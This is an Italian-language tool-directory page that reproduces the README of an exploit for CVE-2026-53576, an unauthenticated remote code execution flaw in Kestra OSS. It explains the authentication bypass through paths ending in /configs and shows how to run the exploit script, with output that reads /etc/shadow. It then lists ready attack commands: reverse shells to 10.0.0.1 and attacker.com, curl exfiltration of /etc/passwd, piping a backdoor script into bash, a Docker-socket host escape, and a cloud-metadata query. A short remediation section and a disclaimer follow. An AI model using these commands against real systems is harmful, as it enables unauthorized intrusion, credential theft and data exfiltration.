Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-53576 — Kestra Unauthenticated RCE Exploit (CVE-2026-53576) | Kitploit
Strumenti/GitHubGitHub/tamatahyt/cve-2026-53576
Authentication & AuthorizationPrivilege EscalationExploitationWeb Application ExploitationData ExfiltrationPost-ExploitationPenetration TestingRed TeamingPayload DevelopmentContainer Escape
GitHubtamatahyt/cve-2026-53576
19 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-53576

Kestra Unauthenticated RCE Exploit (CVE-2026-53576)

Vedi Repository

Exploit RCE non autenticato Kestra (CVE-2026-53576)

Python License Security Kestra

Bypass critico dell'autenticazione che consente l'esecuzione di codice remoto non autenticata

Exploit • Dettagli della vulnerabilità • Impatto • Rimedi


⚠️ DISCLAIMER

Questo strumento è destinato esclusivamente a test di sicurezza educativi e autorizzati.

  • NON usarlo contro sistemi che non possiedi o per i quali non hai un'esplicita autorizzazione scritta al test.
  • NON usarlo per attività illegali.
  • L'autore NON è responsabile di qualsiasi uso improprio di questo strumento.
  • Usalo a TUO RISCHIO.

📋 Indice

  • Panoramica
  • Dettagli della vulnerabilità
  • Utilizzo dell'exploit
  • Installazione
  • Esempi
  • Impatto
  • Rimedi
  • Cronologia
  • Riferimenti
  • Licenza

🔍 Panoramica

CVE-2026-53576 è una vulnerabilità critica in Kestra OSS fino alla versione v1.3.20 che consente l'esecuzione di codice remoto non autenticata tramite un bypass del filtro di autenticazione.

Dettagli chiave


🚨 Dettagli della vulnerabilità

Causa principale

Il filtro di autenticazione in Kestra contiene un difetto logico critico:

root@kitploit:~
// Vulnerable code in AuthenticationFilter.java:53
boolean isConfigEndpoint = request.getPath().endsWith("/configs")

Questo controlla se qualsiasi richiesta API termina con /configs, invece di corrispondere alla rotta esatta. Ciò consente agli aggressori di bypassare l'autenticazione aggiungendo /configs a qualsiasi endpoint.

Fasi dello sfruttamento

  1. Creare un flusso malevolo → POST /api/v1/main/flows/configs (bypassa l'autenticazione)
  2. Attivare l'esecuzione → POST /api/v1/main/executions/configs/configs (bypassa l'autenticazione)
  3. I comandi vengono eseguiti come root → Compromissione completa del sistema

Endpoint vulnerabili

root@kitploit:~
# Any path ending in /configs bypasses authentication
/api/v1/main/flows/configs          # Create flows
/api/v1/main/executions/configs/configs  # Execute flows
/api/v1/{tenant}/flows/configs      # Any tenant
/api/v1/{tenant}/executions/configs/configs  # Any tenant

💻 Utilizzo dell'exploit

Utilizzo di base

root@kitploit:~
python3 kestra_exploit.py <target_ip>

Utilizzo avanzato

root@kitploit:~
# Custom port
python3 kestra_exploit.py 192.168.1.100 -p 8080

# HTTPS
python3 kestra_exploit.py 192.168.1.100 --https

# Custom command
python3 kestra_exploit.py 192.168.1.100 -c "whoami && hostname"

# Check Docker socket access
python3 kestra_exploit.py 192.168.1.100 --docker-check

# Clean up after exploitation
python3 kestra_exploit.py 192.168.1.100 --cleanup

# Full attack with all options
python3 kestra_exploit.py 192.168.1.100 -p 8080 --docker-check --cleanup -c "id > /tmp/proof.txt"

Opzioni dei comandi


📦 Installazione

Requisiti

root@kitploit:~
pip install requests

Clonare il repository

root@kitploit:~
git clone https://github.com/yourusername/CVE-2026-53576
cd CVE-2026-53576

Verificare l'installazione

root@kitploit:~
python3 kestra_exploit.py --help

🎯 Esempi

Esempio 1: Sfruttamento di base

root@kitploit:~
python3 kestra_exploit.py 192.168.1.100

Output:

root@kitploit:~
============================================================
Kestra Unauthenticated RCE Exploit
Security Research Tool - Authorized Use Only!
============================================================
[*] Target: 192.168.1.100:8080
[*] Protocol: http
============================================================

[Step 1] Creating malicious flow...
[*] Creating malicious flow at http://192.168.1.100:8080/api/v1/main/flows/configs
[*] Command: id > /tmp/proof.txt; cat /etc/shadow | head -1 >> /tmp/proof.txt
[+] Flow created successfully! (Status: 200)
[+] Flow revision: 26

[Step 2] Triggering execution...
[*] Triggering execution at http://192.168.1.100:8080/api/v1/main/executions/configs/configs
[+] Execution triggered successfully!
[+] Execution ID: 4nxNTHPk2WInfrnxQa6KF2
[+] Status: CREATED

[Step 3] Checking execution status...
[+] Execution status: SUCCESS
[*] Final status: SUCCESS

[+] Exploitation complete!
[*] To verify the attack succeeded, check the target system for:
    - /tmp/proof.txt containing command output
    - Kestra UI execution logs
    - Web UI: http://192.168.1.100:8080/ui/

Esempio 2: Reverse shell

root@kitploit:~
python3 kestra_exploit.py 192.168.1.100 -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"

Esempio 3: Esfiltrazione dei dati

root@kitploit:~
python3 kestra_exploit.py 192.168.1.100 -c "curl -X POST http://attacker.com/exfil -d @/etc/passwd"

Esempio 4: Verifica della fuga dal container Docker

root@kitploit:~
python3 kestra_exploit.py 192.168.1.100 --docker-check --cleanup

💥 Impatto

Impatto diretto

Capacità di attacco

Un aggressore non autenticato può:

  1. Eseguire comandi arbitrari come root:

    root@kitploit:~
    # Read secrets
    cat /app/conf/application.yml
    
    # Reverse shell
    bash -i >& /dev/tcp/attacker.com/4444 0>&1
    
    # Install malware
    curl http://attacker.com/backdoor.sh | bash
    
  2. Spostarsi sul sistema host (se il socket Docker è montato):

    root@kitploit:~
    docker run -v /:/host --privileged alpine chroot /host
    
  3. Accedere ai metadati cloud (se si è su un provider cloud):

    root@kitploit:~
    curl http://169.254.169.254/latest/meta-data/
    

🛡️ Rimedi

Azioni immediate

  1. Spegnere le istanze vulnerabili:

    root@kitploit:~
    sudo systemctl stop kestra
    
  2. Bloccare l'accesso pubblico:

    root@kitploit:~
    iptables -A INPUT -p tcp --dport 8080 -j DROP
    
  3. Applicare regole firewall:

    • Limitare alle reti interne
    • Usare una VPN per l'accesso amministrativo

Soluzione permanente

  1. Aggiornare Kestra all'ultima versione corretta:

    • Monitorare: https://github.com/kestra-io/kestra
    • Controllare: https://github.com/kestra-io/kestra/security/advisories/GHSA-2q47-568g-9h4f
  2. Implementare un'autenticazione corretta:

    • Usare OAuth2/OIDC invece dell'autenticazione di base
    • Abilitare l'autenticazione multi-fattore
  3. Hardening dei container:

    • Eseguire con utente non root
    • Non montare /var/run/docker.sock
    • Usare un filesystem root in sola lettura
  4. Hardening della rete:

    • Usare un API gateway con routing corretto
    • Implementare regole WAF
    • Abilitare la validazione delle richieste

📅 Cronologia

DataEvento
2026-05-26Vulnerabilità scoperta
2026-06-03Advisory di sicurezza Kestra pubblicato
2026-06-10

📚 Riferimenti

  • Advisory di sicurezza Kestra GHSA-2q47-568g-9h4f
  • Huawei PSIRT
  • Dettagli CVE-2026-53576
  • OWASP Top 10 - Broken Access Control

📄 Licenza

root@kitploit:~
MIT License

Copyright (c) 2026 Security Researcher

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

⭐ Supporto

Se trovi utile questo strumento:

  • ⭐ Metti una stella al repository
  • 🐛 Segnala problemi
  • 🔄 Invia pull request
  • 📢 Condividi in modo responsabile

🙏 Riconoscimenti

  • Il team di Kestra per il loro advisory di sicurezza
  • I ricercatori di sicurezza che hanno divulgato questa vulnerabilità
  • La community open source della sicurezza

⚠️ USA IN MODO RESPONSABILE ⚠️

Segnala una vulnerabilità • Informativa sulla sicurezza • Contatto

Scarica lo strumento
AttributoValore
ID CVECVE-2026-53576
GravitàCritica (9.8 CVSS)
Tipo di vulnerabilitàBypass dell'autenticazione + RCE
Prodotto interessatoKestra OSS
Versioni interessate≤ v1.3.20
Vettore di attaccoRete
Autenticazione richiestaNessuna
Interazione dell'utenteNessuna
OpzioneDescrizione
targetIndirizzo IP o hostname del target (obbligatorio)
-p, --portPorta (predefinita: 8080)
--httpsUsa HTTPS invece di HTTP
-c, --commandComando personalizzato da eseguire
--docker-checkVerifica l'accesso al socket Docker
--cleanupElimina il flusso dopo lo sfruttamento
--delayRitardo tra le richieste (predefinito: 2s)
CategoriaGravitàDescrizione
Riservatezza⚠️ CriticaLeggere qualsiasi file (password, segreti, configurazioni)
Integrità⚠️ CriticaCreare/modificare/eliminare flussi e dati
Disponibilità⚠️ AltaArresto del sistema, esaurimento delle risorse
Autenticazione⚠️ CriticaBypass completo dell'autenticazione di base (Basic-Auth)
Escalation dei privilegi⚠️ CriticaI comandi vengono eseguiti come root (uid=0)
Fuga dal container⚠️ CriticaCompromissione dell'host tramite il socket Docker
Assegnato il CVE-2026-53576
2026-06-15Divulgazione pubblica
2026-08-01PoC pubblicato